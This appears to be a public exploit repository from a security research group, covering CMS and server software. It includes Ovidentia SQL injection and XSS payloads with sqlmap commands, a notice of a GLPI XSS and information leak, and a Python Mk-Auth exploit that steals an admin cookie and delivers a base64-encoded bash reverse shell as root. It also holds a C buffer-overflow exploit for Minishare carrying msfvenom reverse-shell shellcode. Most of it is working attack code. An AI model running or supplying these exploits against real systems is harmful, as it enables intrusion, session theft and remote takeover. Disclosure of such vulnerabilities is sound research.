├── README.md
├── cms
├── GLPI
│ ├── GLPI-stored-XSS
│ │ └── README.md
│ └── dashboard-plugin
│ │ └── README.md
└── ovidentia
│ ├── exploitSQLIOvidentia.txt
│ └── exploitXSSOvidentia.txt
├── mk-auth
├── Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf
└── xss2root.py
└── windows
└── servers
└── minishare
└── minishare_141_xpl.c
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | ## Public Exploits
6 |
7 | This repository cotains public exploits written by UserX and N3k00n3.
8 |
9 | ## Exploits
10 |
11 | * CMS
12 | * [XSS - Ovidentia 8.4.3](./cms/ovidentia/exploitXSSOvidentia.txt)
13 | * [SQLi - Ovidentia 8.4.3](./cms/ovidentia/exploitSQLIOvidentia.txt)
14 | * Servers
15 | * [Minishare](./windows/server/minishare/minishare_141_xpl.c)
16 |
--------------------------------------------------------------------------------
/cms/GLPI/GLPI-stored-XSS/README.md:
--------------------------------------------------------------------------------
1 | # XSS Stored via Plugin metadata.
2 |
3 | Author: Fernando Pinheiro
4 | GLPI version: >= 9.5.4
5 |
6 |
7 | It was possible to insert JavaScript codes into plugins metadata as Author, version,license and so on...
8 |
9 | Once the plugin is sent to the plugins folder at /glpi/plugins
10 |
11 | This code will be loaded into GLPI plugin instalation. Once the glpi read this information from the file and doesn't sanitize what will be rendered.
12 |
13 |
14 |
--------------------------------------------------------------------------------
/cms/GLPI/dashboard-plugin/README.md:
--------------------------------------------------------------------------------
1 | # Information Disclose
2 | Plugin Name: DashBoard
3 | Plugin Version: <=1.0.2
4 |
5 | Para quem viu o post sobre [arquivos de log do GLPI](https://medium.com/@emmapinheiro42/glpi-pesquisa-parte-02-1cb3a2b95a92) que geralmente são esquecidos com permissões de leitura e são de grande ajuda para enumeração de usuários.
6 |
7 | Hoje vou trazer uma forma interessante de ver esse mesmo arquivo de forma autenticada com usuário de poucos privilégios, uma maneira de bypass para quando esse arquivo estiver com as devidas proteções.
8 |
9 | O GLPI permite o uso de plugins que podem ser encontrados em diversos lugares, mas é mais comum no github e no [site oficial](https://plugins.glpi-project.org/#/) de plugins.
10 |
11 | Se procuramos por Dashboard, vamos encontrar um dos plugins mais usados por quem implementa o GLPI. Esse plugin é escrito e mantido por [stdonato](https://github.com/stdonato/glpi-dashboard/).
12 |
13 |
14 | O caminho para os plugins do GLPI é na pasta plugins:
15 | https://example.com/glpi/plugins/
16 |
17 | Geralmente essa pasta é usada depois da instalação do GLPI e acaba sendo esquecida de ser protegida, com a listagem de diretórios se torna fácil a enumeração de plugins usados.
18 |
19 |
20 | Notando que existe o plugin dashboard é possível ver os últimos 10 eventos, o que um usuário comum não teria acesso direto para o arquivo
21 | glpi/front/event.php, agora pode acessar esses mesmos eventos por meio do arquivo main2.php que fica na pasta /plugins/dashboard/front/main2.php.
22 |
23 | Além de poder observar os eventos, usuários com baixo privilégios também tem acesso para outras informações úteis e que não deveriam ser acessadas por eles, como por exemplo:
24 |
25 | * quem está conectado no momento
26 | * Quem são os técnicos da aplicação por meio dos chamados abertos por eles na categoria tech.
27 | * últimos chamados de outros clientes
28 | * Quantos usuários existem atualmente no banco.
29 |
--------------------------------------------------------------------------------
/cms/ovidentia/exploitSQLIOvidentia.txt:
--------------------------------------------------------------------------------
1 | #-------------------------------------------------------
2 | # Exploit Title: Ovidentia CMS - SQL Injection (Authenticated)
3 | # Date: 06/05/2019
4 | # [ CVE-2019-13978 ]
5 | # Exploit Author:
6 | # Fernando Pinheiro (n3k00n3)
7 | # Victor Flores (UserX)
8 | # Vendor Homepage: https://www.ovidentia.org/
9 | # Version: 8.4.x < 8.6.4
10 | # Tested on: Mac,linux - Firefox, safari
11 | # Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
12 | #
13 | # [ Kitsun3Sec Research Group ]
14 | #--------------------------------------------------------
15 |
16 | POC
17 |
18 | Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
19 | Type: GET
20 | Vulnerable Field: id
21 | Payload:
22 | 1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
23 | 2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)
24 |
25 | URL: https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1
26 |
27 | Using Request file
28 | sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
29 |
30 | Using Get
31 | ./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
32 |
33 | ---
34 |
35 | [CHANGELOG]
36 |
37 | 4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.
38 |
--------------------------------------------------------------------------------
/cms/ovidentia/exploitXSSOvidentia.txt:
--------------------------------------------------------------------------------
1 | #-------------------------------------------------------
2 | # Exploit Title: Ovidentia CMS - XSS Ovidentia 8.4.3
3 | # The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS.
4 | # Date: 06/05/2019
5 | # [ CVE-2019-13977 ]
6 | # Exploit Author:
7 | # Fernando Pinheiro (n3k00n3)
8 | # Victor Flores (UserX)
9 | # Vendor Homepage: https://www.ovidentia.org/
10 | # Version: 8.4.3 <= 8.6.4
11 | # Tested on: Mac,linux - Firefox, safari
12 | # Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
13 | #
14 | # [ Kitsun3Sec Research Group ]
15 | #--------------------------------------------------------
16 |
17 | POC
18 |
19 | >========================================================
20 | Stored XSS
21 | >========================================================
22 |
23 | 1. POST http://TARGET/ovidentia/index.php?tg=groups
24 | Field:
25 | nom
26 | 2. POST http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
27 | Fields:
28 | Nom
29 | Description
30 | 3. GET http://TARGET/ovidentia/index.php?tg=delegat
31 | Show groups
32 | 4. POST http://TARGET/ovidentia/index.php?tg=site&idx=create
33 | http://TARGET/ovidentia/index.php?tg=site&item=4
34 | Fields:
35 | Nom
36 | address
37 | description
38 | 5. POST http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
39 | Fields:
40 | Libellé du champ
41 | Explosion:
42 | http://TARGET/ovidentia/index.php?tg=forums&idx=notices
43 | http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
44 | http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
45 | 6. POST http://TARGET/ovidentia/index.php?tg=notes&idx=Create
46 | Fields: Notes
47 | Explosion:
48 | http://TARGET/ovidentia/index.php?tg=notes&idx=List
49 |
50 | 7. POST http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
51 | Fields: all
52 | Explosion:
53 | http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
54 |
55 |
56 | >========================================================
57 | REFLECTED
58 | >========================================================
59 |
60 | 1. GET http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
61 |
62 |
63 | ---
64 |
65 |
66 | [CHANGELOG]
67 |
68 | 4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.
69 |
--------------------------------------------------------------------------------
/mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kitsun3Sec/exploits/2901f6d654f3f0c4f58f43be04ef7bfdf552647c/mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf
--------------------------------------------------------------------------------
/mk-auth/xss2root.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | #
3 | # 0day - Authenticated Stored XSS that leads to root!
4 | #
5 | import requests
6 | import sys
7 | import getopt
8 | import re
9 | import os
10 | import threading
11 | import socket
12 | import base64
13 |
14 | kitsun3 = '''
15 | @@@@@@@@@@@@@@@@&&@@@@@@@@@@@@@@@@@@@@@@@@@&&@@@@@@@@@@@@@@@
16 | @@@@@@@@@@@@@@&&&&&&&@@@@@@@@@@@@@@@@@@@@&&&&&&@@@@@@@@@@@@@
17 | @@@@@@@@@@@@#&&&&&&&&@@@@@@@@@@@@@@@@@@@@&&&&&&&@@@@@@@@@@@@
18 | @@@@@@@@@@@@&&&. .&&&&@@@@@@@@@@@@@@@@@@&&&. .&&&@@@@@@@@@@@
19 | @@@@@@@@@@@&&&& &&&&&@@@@@@@@@@@@@@@&&&&& &&&&@@@@@@@@@@
20 | @@@@@@@@@@@&&&.. ,%&&&&@%%%%%%%%%%%@&&&&&, ..&&&@@@@@@@@@@
21 | @@@@@@@@@@&%%%..* *#%%%%*************%%%%%* *..%%%@@@@@@@@@@
22 | @@@@@@@@%%%%%%.*******************************.%%%%%%@@@@@@@
23 | @@@@@@@@%,..**************************************..%@@@@@@@
24 | @@@@@@@@@%*.***************************************%@@@@@@@@
25 | @@@@@@@%%.(#.*************,*******,*************.,(.%%@@@@@@
26 | @@@@@@@%..,,.*.****((****, ,*****, ,****/#****.*..,..%@@@@@@
27 | @@@@@@@@@%*...*****%&&*****************#&&*****...*%@@@@@@@@
28 | @@@@@@@@%%%%%%..****(&&***************&&%****..%%%%%%@@@@@@@
29 | @@@@@@@@@%*......******&*************&/*****......*%@@@@@@@@
30 | @@@@@@@@@@@@@@%###..,********************,.###%@@@@@@@@@@@@@
31 | @@@@@@@@@@@@@@@@@@@@%%.***************.(&@@@@@@@@@@@@@@@@@@@
32 | @@@@@@@@@@@@@@@@@@@@@@@%.***********.%@@@@@@@@@@@@@@@@@@@@@@
33 | @@@@@@@@@@@@@@@@@@@@@@@@%.*********.%@@@@@@@@@@@@@@@@@@@@@@@
34 | @@@@@@@@@@@@@@@@@@@@@@@@@@#.&&&&&.#@@@@@@@@@@@@@@@@@@@@@@@@@
35 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%@@@@@@@@@@@@@@@@@@@@@@@@@@@
36 | '''
37 |
38 | target = ''
39 | cookies = ''
40 | user = ''
41 | password = ''
42 | local_port = ''
43 | local_ip = ''
44 | admin_cookie = 'Kitsun3Sec'
45 | payload = ''
46 |
47 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": target+"/central/executar_login.php", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Pragma": "no-cache", "Cache-Control": "no-cache"}
48 |
49 | def show_help():
50 | print("\n\t*********************************")
51 | print("\t MK-Auth Exploit by Kitsun3Sec ")
52 | print("\t By: alacerda (velocista) ")
53 | print("\t Thanks to: fcsantos (shadow) ")
54 | print("\t*********************************")
55 | print("\nINFO:\n\nThis exploit opens up a temporary listener on port 8081 to steal the Administrator's auth cookie and, after that, starts a netcat listener on the port choosen by the attacker and waits for the moment when the administrator opens the malicious message (a bad \"chamado\"). Once the Administrator opens the message, you will receive a root shell back!\n")
56 | print("Usage.: " + sys.argv[0] + " \n")
57 | print("ARGS:")
58 | print("\t-t:\t Target IP address (Mk-Auth IP)")
59 | print("\t-l:\t Local IP address (Your IP)")
60 | print("\t-p:\t Local PORT for Reverse Shell")
61 | print("\t-U:\t Username (valid client username)")
62 | print("\t-P:\t Password (valid password for the client)")
63 | print("\t-h:\t This help")
64 |
65 | print("\nEXAMPLE\n")
66 | print("If the target server has the IP address 192.168.25.136, your IP address is 192.168.25.137 and you want to receive the reverse shell on port 9090:\n")
67 | print("\t" + sys.argv[0] + " -t 192.168.25.136 -U myuser -P password123 -l 192.168.25.137 -p 9090")
68 |
69 | print("\n")
70 | sys.exit(0)
71 |
72 | def open_reverse():
73 | url = target+"/admin/terminal.php"
74 | goodEvil = base64.b64encode("sudo bash -i >& /dev/tcp/" + local_ip +"/" + local_port + " 0>&1")
75 | data = {"comando": "sleep 5; echo " + goodEvil + " | base64 -d | bash", "terminal": "linux"}
76 | target_resp = requests.post(url, headers=headers, cookies=admin_cookie, data=data)
77 |
78 | def goingForTheKill():
79 | ists = threading.Thread(target=open_reverse)
80 | ists.start()
81 | os.system("nc -nlvp " + local_port)
82 |
83 | def listen_admin_cookie():
84 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
85 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
86 | sock.bind(("",8081))
87 | sock.listen(1)
88 | connection, client_address = sock.accept()
89 | return connection.recv(1024)
90 |
91 | def wait_admin():
92 | global admin_cookie
93 |
94 | while "centralmka2" not in admin_cookie:
95 | admin_cookie = listen_admin_cookie()
96 |
97 | tmp = admin_cookie
98 | admin_cookie = {"centralmka2": tmp.split()[1].split('=')[1].split(';')[0], "mka": tmp.split()[1].split('=')[2]}
99 |
100 | print("We just recieved a cookie... Lets try it!")
101 | goingForTheKill()
102 |
103 | def abrir_chamado():
104 | url = target+"/central/suporte.php?page=ins_chamado"
105 | chamado_resp = requests.get(url, headers=headers, cookies=cookies)
106 |
107 | protocolo = re.findall(r'.*txt_chamado" value="(.*)"', chamado_resp.text)
108 | print("Chamado N.: " + protocolo[0])
109 |
110 | url = target+"/central/executar_central.php?acao=ins_chamado"
111 | data = {"assunto": "Financeiro", "msg": payload, "nome": "Kitsun3Sec", "email": "kitsun3@sec.br", "chamado": protocolo[0], "abertura": "22/03/2020 21:37:42"}
112 | criar_resp = requests.post(url, headers=headers, cookies=cookies, data=data)
113 | #print(criar_resp.text)
114 | if criar_resp.status_code == 200:
115 | print("Payload sent.Let us wait for the admin token...")
116 | wait_admin()
117 |
118 | def login():
119 | global cookies
120 | url = target+"/central/login.php"
121 | resp = requests.get(url, headers=headers)
122 |
123 | #Cookies @ resp.cookies
124 | cookies = resp.cookies
125 |
126 | #CSRF-Token @ csrf_token[0]
127 | csrf_token = re.findall(r'.*token_central" value="(.*)"', resp.text)
128 |
129 | url = target+"/central/executar_login.php"
130 | data = {"token_central": csrf_token[0], "txt_login": user, "txt_senha": password}
131 | login_resp = requests.post(url, headers=headers, cookies=cookies, data=data)
132 |
133 | if login_resp.status_code == 200:
134 | print(" \\0/")
135 | print("We are logged in!")
136 | abrir_chamado()
137 | else:
138 | print("':( ")
139 | print("Login Failed! Are you sure your credential is valid?")
140 |
141 | def main(argv):
142 | print(kitsun3)
143 | global target
144 | global user
145 | global password
146 | global local_port
147 | global local_ip
148 | global payload
149 |
150 | try:
151 | opts, args = getopt.getopt(argv,"t:l:p:hU:P:")
152 | except getopt.GetoptError:
153 | show_help()
154 |
155 | for opt, arg in opts:
156 | if opt == '-h':
157 | show_help()
158 | # target
159 | elif opt == '-t':
160 | target = "http://"+arg
161 | # Local IP
162 | elif opt == '-l':
163 | local_ip = arg
164 | payload = ""
165 | # Local port for reverse shell
166 | elif opt == '-p':
167 | local_port = arg
168 | elif opt == '-U':
169 | user = arg
170 | elif opt == '-P':
171 | password = arg
172 | else:
173 | show_help()
174 |
175 | login()
176 |
177 | if __name__ == "__main__":
178 | if len(sys.argv) < 2:
179 | show_help()
180 | main(sys.argv[1:])
181 |
--------------------------------------------------------------------------------
/windows/servers/minishare/minishare_141_xpl.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Exploit Title: Minishare 1.4.1 RCE exploit
3 | * Date: 17th of April of 2019
4 | * Exploit Author: Victor Vigel Flores
5 | * Vendor Homepage: https://sourceforge.net/projects/minishare/
6 | * Software Link: https://sourceforge.net/projects/minishare/
7 | * Version: 1.4.1
8 | * Tested on: Microsoft Windows 2000 ~ XP-SP3
9 | * CVE : 2004-2271
10 | */
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 |
17 | #include
18 |
19 | #include
20 | #include
21 | #include
22 | #include
23 |
24 | #include
25 |
26 | #define SA struct sockaddr
27 | #define SA_IN struct sockaddr_in
28 |
29 | #define BUFF_ERR_LENGTH 1787
30 | #define PAYLOAD_LENGTH 2500
31 |
32 | #define GET "GET "
33 | #define HTTP " HTTP/1.1\r\n\r\n"
34 |
35 | void generate_random_text(char * str, size_t size);
36 | char * mount_payload(const int target);
37 | int createSocket (const char * target, const int port);
38 |
39 | /*
40 | * msfvenom -p windows/shell_reverse_tcp LHOST=X.X.X.X LPORT=1337
41 | * EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40"
42 | * -f c -v payload
43 | */
44 | unsigned char pload[] =
45 | "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
46 | "\xb7\xa7\xaa\x94\x83\xee\xfc\xe2\xf4\x4b\x4f\x28\x94\xb7\xa7"
47 | "\xca\x1d\x52\x96\x6a\xf0\x3c\xf7\x9a\x1f\xe5\xab\x21\xc6\xa3"
48 | "\x2c\xd8\xbc\xb8\x10\xe0\xb2\x86\x58\x06\xa8\xd6\xdb\xa8\xb8"
49 | "\x97\x66\x65\x99\xb6\x60\x48\x66\xe5\xf0\x21\xc6\xa7\x2c\xe0"
50 | "\xa8\x3c\xeb\xbb\xec\x54\xef\xab\x45\xe6\x2c\xf3\xb4\xb6\x74"
51 | "\x21\xdd\xaf\x44\x90\xdd\x3c\x93\x21\x95\x61\x96\x55\x38\x76"
52 | "\x68\xa7\x95\x70\x9f\x4a\xe1\x41\xa4\xd7\x6c\x8c\xda\x8e\xe1"
53 | "\x53\xff\x21\xcc\x93\xa6\x79\xf2\x3c\xab\xe1\x1f\xef\xbb\xab"
54 | "\x47\x3c\xa3\x21\x95\x67\x2e\xee\xb0\x93\xfc\xf1\xf5\xee\xfd"
55 | "\xfb\x6b\x57\xf8\xf5\xce\x3c\xb5\x41\x19\xea\xcf\x99\xa6\xb7"
56 | "\xa7\xc2\xe3\xc4\x95\xf5\xc0\xdf\xeb\xdd\xb2\xb0\x58\x7f\x2c"
57 | "\x27\xa6\xaa\x94\x9e\x63\xfe\xc4\xdf\x8e\x2a\xff\xb7\x58\x7f"
58 | "\xc4\xe7\xf7\xfa\xd4\xe7\xe7\xfa\xfc\x5d\xa8\x75\x74\x48\x72"
59 | "\x3d\xfe\xb2\xcf\xa0\x9f\xb7\xfb\xc2\x96\xb7\xa2\x93\x1d\x51"
60 | "\xcd\xba\xc2\xe0\xcf\x33\x31\xc3\xc6\x55\x41\x32\x67\xde\x98"
61 | "\x48\xe9\xa2\xe1\x5b\xcf\x5a\x21\x15\xf1\x55\x41\xdf\xc4\xc7"
62 | "\xf0\xb7\x2e\x49\xc3\xe0\xf0\x9b\x62\xdd\xb5\xf3\xc2\x55\x5a"
63 | "\xcc\x53\xf3\x83\x96\x95\xb6\x2a\xee\xb0\xa7\x61\xaa\xd0\xe3"
64 | "\xf7\xfc\xc2\xe1\xe1\xfc\xda\xe1\xf1\xf9\xc2\xdf\xde\x66\xab"
65 | "\x31\x58\x7f\x1d\x57\xe9\xfc\xd2\x48\x97\xc2\x9c\x30\xba\xca"
66 | "\x6b\x62\x1c\x4a\x89\x9d\xad\xc2\x32\x22\x1a\x37\x6b\x62\x9b"
67 | "\xac\xe8\xbd\x27\x51\x74\xc2\xa2\x11\xd3\xa4\xd5\xc5\xfe\xb7"
68 | "\xf4\x55\x41";
69 |
70 | const char nops[] =
71 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
72 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
73 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
74 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
75 | "\x90";
76 |
77 |
78 | const char * targets[] = {
79 | "\xab\xa3\x54\x77", // Windows 2000 SP0->SP3 English */
80 | "\x64\xf1\x17\x75", // Windows 2000 SP4 English */
81 | "\x54\x1d\xab\x71", // Windows XP SP0-SP1 English */
82 | "\x72\x93\xab\x71", // Windows XP SP2 English */
83 | "\x4d\x3c\xc0\x71", // Windows 2003 SP0 English */
84 | "\x80\x36\x40\x77", // Windows 2003 SP1 English */
85 | "\x80\x26\x40\x77", // Windows 2003 SP2 English */
86 | "\xf8\x29\xf3\x77", // Windows NT 4.0 SP6 */
87 | "\x0a\xaf\xd5\x77", // Windows XP SP2 German */
88 | "\x6e\xe2\xd4\x77", // Windows XP SP2 Polish */
89 | "\x0a\xaf\xd5\x77", // Windows XP SP2 French */
90 | "\x53\x93\x3a\x7e" // Windows XP SP3 French */
91 | };
92 |
93 | int
94 | createSocket(const char * target, const int port) {
95 | int sockfd = socket (AF_INET, SOCK_STREAM, 0);
96 | if (sockfd < 0) {
97 | perror ("unable to create socket");
98 | exit(EXIT_FAILURE);
99 | }
100 |
101 | SA_IN hostaddr;
102 | bzero(&hostaddr, sizeof(hostaddr));
103 | hostaddr.sin_family = AF_INET;
104 | hostaddr.sin_addr.s_addr = inet_addr (target);
105 | hostaddr.sin_port = htons (port);
106 |
107 | if (connect (sockfd, (SA *)&hostaddr, sizeof (hostaddr)) != 0) {
108 | perror ("trying to reach the target");
109 | exit(EXIT_FAILURE);
110 | }
111 | return sockfd;
112 | }
113 |
114 | void
115 | generate_random_text(char * str, size_t size) {
116 | const char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVXWYZabcdefghijklmnopqrstuvxwyz";
117 |
118 | srand(time(NULL));
119 | for (size_t i = 0; i < size; i++) {
120 | str[i] = alphabet[rand() % strlen(alphabet)];
121 | }
122 | str[size] = 0x00;
123 | }
124 |
125 | char *
126 | mount_payload (const int target) {
127 | if (target < 0 || target > 11) {
128 | fprintf (stderr, "Invalid OS target [!!]\n");
129 | exit (EXIT_FAILURE);
130 | }
131 |
132 | char * payload = (char *) calloc (PAYLOAD_LENGTH, sizeof (char));
133 | char rand_text[BUFF_ERR_LENGTH];
134 | generate_random_text (rand_text, BUFF_ERR_LENGTH);
135 | sprintf(payload, "%s%s%s%s%s", GET, rand_text, targets[target], nops, pload);
136 |
137 | int len = strlen(payload);
138 | int remain = PAYLOAD_LENGTH - len - 13;
139 |
140 | for (int i = 0; i < remain; i++) {
141 | payload[(len)+i] = 'B';
142 | }
143 |
144 | strncat (payload, HTTP, PAYLOAD_LENGTH);
145 |
146 | return payload;
147 | }
148 |
149 | int
150 | main(int argc, char ** argv) {
151 |
152 | if (argc < 4) {
153 | printf ("Usage: %s \n", argv[0]);
154 | exit (EXIT_SUCCESS);
155 | }
156 | char * payload = mount_payload (atoi(argv[3]));
157 | int sockfd = createSocket (argv[1], atoi(argv[2]));
158 |
159 | write (sockfd, payload, strlen(payload));
160 |
161 | free (payload);
162 | close(sockfd);
163 |
164 | return 0;
165 | }
166 |
--------------------------------------------------------------------------------